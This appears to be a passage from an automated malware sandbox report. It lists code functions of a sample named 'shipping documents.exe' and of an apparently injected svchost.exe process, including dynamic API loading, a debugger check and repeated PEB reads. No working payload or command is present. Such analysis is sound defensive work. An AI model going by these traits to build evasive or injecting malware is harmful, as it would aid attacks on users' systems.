Code function: 0_2_00685CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00685CCC

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_006CC304 LoadLibraryA,GetProcAddress,

0_2_006CC304

Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_03BA3520 mov eax, dword ptr fs:[00000030h]	0_2_03BA3520
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_03BA34C0 mov eax, dword ptr fs:[00000030h]	0_2_03BA34C0
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_03BA1E70 mov eax, dword ptr fs:[00000030h]	0_2_03BA1E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]	2_2_02F402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]	2_2_02F402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]	2_2_02F402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03008324 mov eax, dword ptr fs:[00000030h]	2_2_03008324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03008324 mov ecx, dword ptr fs:[00000030h]	2_2_03008324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03008324 mov eax, dword ptr fs:[00000030h]	2_2_03008324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03008324 mov eax, dword ptr fs:[00000030h]	2_2_03008324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0300634F mov eax, dword ptr fs:[00000030h]	2_2_0300634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F402A0 mov eax, dword ptr fs:[00000030h]	2_2_02F402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F402A0 mov eax, dword ptr fs:[00000030h]	2_2_02F402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]	2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]	2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]	2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]	2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]	2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]	2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h]	2_2_02F6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h]	2_2_02F6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]	2_2_02FB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]	2_2_02FB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]	2_2_02FB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]	2_2_02F34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]	2_2_02F34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]	2_2_02F34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2826B mov eax, dword ptr fs:[00000030h]	2_2_02F2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2A250 mov eax, dword ptr fs:[00000030h]	2_2_02F2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36259 mov eax, dword ptr fs:[00000030h]	2_2_02F36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEA250 mov eax, dword ptr fs:[00000030h]	2_2_02FEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEA250 mov eax, dword ptr fs:[00000030h]	2_2_02FEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB8243 mov eax, dword ptr fs:[00000030h]	2_2_02FB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB8243 mov ecx, dword ptr fs:[00000030h]	2_2_02FB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2823B mov eax, dword ptr fs:[00000030h]	2_2_02F2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F663FF mov eax, dword ptr fs:[00000030h]	2_2_02F663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]	2_2_02FDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]	2_2_02FDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE3DB mov ecx, dword ptr fs:[00000030h]	2_2_02FDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]	2_2_02FDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h]	2_2_02FD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h]	2_2_02FD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEC3CD mov eax, dword ptr fs:[00000030h]	2_2_02FEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]	2_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]	2_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]	2_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]	2_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB63C0 mov eax, dword ptr fs:[00000030h]	2_2_02FB63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0300625D mov eax, dword ptr fs:[00000030h]	2_2_0300625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]	2_2_02F28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]	2_2_02F28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]	2_2_02F28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]	2_2_02F2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]	2_2_02F2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]	2_2_02F2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]	2_2_02F5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]	2_2_02F5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD437C mov eax, dword ptr fs:[00000030h]	2_2_02FD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]	2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]	2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]	2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB035C mov ecx, dword ptr fs:[00000030h]	2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]	2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]	2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFA352 mov eax, dword ptr fs:[00000030h]	2_2_02FFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD8350 mov ecx, dword ptr fs:[00000030h]	2_2_02FD8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030062D6 mov eax, dword ptr fs:[00000030h]	2_2_030062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2C310 mov ecx, dword ptr fs:[00000030h]	2_2_02F2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F50310 mov ecx, dword ptr fs:[00000030h]	2_2_02F50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]	2_2_02F6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]	2_2_02F6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]	2_2_02F6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]	2_2_02F2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F720F0 mov ecx, dword ptr fs:[00000030h]	2_2_02F720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_02F2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F380E9 mov eax, dword ptr fs:[00000030h]	2_2_02F380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB60E0 mov eax, dword ptr fs:[00000030h]	2_2_02FB60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB20DE mov eax, dword ptr fs:[00000030h]	2_2_02FB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF60B8 mov eax, dword ptr fs:[00000030h]	2_2_02FF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]	2_2_02FF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F280A0 mov eax, dword ptr fs:[00000030h]	2_2_02F280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC80A8 mov eax, dword ptr fs:[00000030h]	2_2_02FC80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004164 mov eax, dword ptr fs:[00000030h]	2_2_03004164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004164 mov eax, dword ptr fs:[00000030h]	2_2_03004164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3208A mov eax, dword ptr fs:[00000030h]	2_2_02F3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5C073 mov eax, dword ptr fs:[00000030h]	2_2_02F5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F32050 mov eax, dword ptr fs:[00000030h]	2_2_02F32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6050 mov eax, dword ptr fs:[00000030h]	2_2_02FB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC6030 mov eax, dword ptr fs:[00000030h]	2_2_02FC6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2A020 mov eax, dword ptr fs:[00000030h]	2_2_02F2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2C020 mov eax, dword ptr fs:[00000030h]	2_2_02F2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]	2_2_02F4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]	2_2_02F4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]	2_2_02F4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]	2_2_02F4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030061E5 mov eax, dword ptr fs:[00000030h]	2_2_030061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB4000 mov ecx, dword ptr fs:[00000030h]	2_2_02FB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F601F8 mov eax, dword ptr fs:[00000030h]	2_2_02F601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]	2_2_02FF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]	2_2_02FF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]	2_2_02FB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]	2_2_02FB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]	2_2_02FB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]	2_2_02FB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]	2_2_02F2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]	2_2_02F2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]	2_2_02F2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F70185 mov eax, dword ptr fs:[00000030h]	2_2_02F70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]	2_2_02FEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]	2_2_02FEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]	2_2_02FD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]	2_2_02FD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2C156 mov eax, dword ptr fs:[00000030h]	2_2_02F2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC8158 mov eax, dword ptr fs:[00000030h]	2_2_02FC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]	2_2_02F36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]	2_2_02F36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]	2_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]	2_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC4144 mov ecx, dword ptr fs:[00000030h]	2_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]	2_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]	2_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F60124 mov eax, dword ptr fs:[00000030h]	2_2_02F60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDA118 mov ecx, dword ptr fs:[00000030h]	2_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]	2_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]	2_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]	2_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF0115 mov eax, dword ptr fs:[00000030h]	2_2_02FF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]	2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]	2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]	2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]	2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]	2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]	2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]	2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]	2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]	2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]	2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_02FAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_02FAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_02FAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_02FAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]	2_2_02FB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]	2_2_02FB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_02F6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]	2_2_02F6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F666B0 mov eax, dword ptr fs:[00000030h]	2_2_02F666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]	2_2_02F6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]	2_2_02F34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]	2_2_02F34690
